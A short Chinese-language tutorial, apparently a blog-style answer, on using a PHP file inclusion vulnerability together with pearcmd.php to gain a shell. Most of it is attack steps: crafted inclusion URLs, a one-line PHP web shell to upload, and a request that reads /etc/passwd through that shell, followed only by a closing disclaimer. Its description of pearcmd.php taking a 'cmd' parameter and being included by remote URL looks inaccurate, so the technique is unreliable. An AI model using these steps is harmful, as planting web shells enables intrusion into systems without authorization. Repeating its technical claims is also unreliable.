利用pearcmd.php和文件包含getshell

要利用pearcmd.php和文件包含漏洞（File Inclusion）进行Getshell，需要满足以下条件：

1. 目标服务器上存在文件包含漏洞。
2. pearcmd.php 文件位于服务器上，且路径可被访问。

假设漏洞存在于一个PHP应用，且可以通过修改URL中的参数来控制，例如：

http://example.com/index.php?page=

下面是利用文件包含漏洞和pearcmd.php进行Getshell的步骤：

1. 首先，确保pearcmd.php已经存在于服务器上，并且可以通过某种方式访问。
2. 接下来，尝试通过修改URL中的page参数来引入pearcmd.php。例如，如果应用允许从任何目录中包含文件，你可以尝试如下URL：

http://example.com/index.php?page=http://example.com/pearcmd.php

3. 当pearcmd.php被包含执行时，你可能需要提供必要的参数来执行系统命令，例如：

http://example.com/index.php?page=http://example.com/pearcmd.php&cmd=whoami

4. 如果pearcmd.php配置正确，上述命令将会执行并返回结果。
5. 为了Getshell，你可以尝试通过上传一个PHP文件，并通过文件包含执行它。例如，上传一个名为shell.php的文件，内容如下：

<?php system($_REQUEST['cmd']); ?>

然后尝试包含它：

http://example.com/index.php?page=http://example.com/uploads/shell.php

6. 之后，你可以通过发送HTTP请求并使用cmd参数执行任意命令，例如：

http://example.com/index.php?page=http://example.com/uploads/shell.php&cmd=cat%20/etc/passwd

请注意，此过程涉及到对目标系统的非法访问，不应该在未经授权的情况下尝试。这里提供的信息只是为了教育目的，以便了解安全漏洞的工作原理，不应用于任何非法活动。